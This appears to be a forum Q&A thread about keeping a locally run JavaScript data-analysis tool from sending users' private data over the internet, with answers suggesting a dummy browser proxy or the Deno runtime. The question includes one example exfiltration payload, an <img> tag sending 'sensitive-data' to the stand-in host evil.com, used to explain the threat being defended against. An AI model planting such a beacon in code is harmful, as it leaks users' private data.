The background scenario is that I want to give my users a javascript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to internet. Initially, I thought I'll just distribute it as an .html file with embeded <script>, and that they'll just run this .html file in browser over file:/// protocol, which gives some nice same-origin policy defaults. But, this won't really offer much security to my users: a javascript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because by design embeding of images from different origins is allowed.

Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet? (unpluging the machine from the internet, installing VM, or manipulating firewall settings, are not practical) (reasonably sure=assumming that the software such us browser they use follows the spec and wasn't hacked)?

CodePudding user response：

Setting up browser proxy in settings to localhost:DUMMY_PORT looks like safe solution for this case.

CodePudding user response：

Deno is, to cite its website:

Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.

• Secure by default. No file, network, or environment access, unless explicitly enabled.

So, this reduces the trust of the user to the trust in deno (and to chocolatey if they want to use choco install deno to install deno).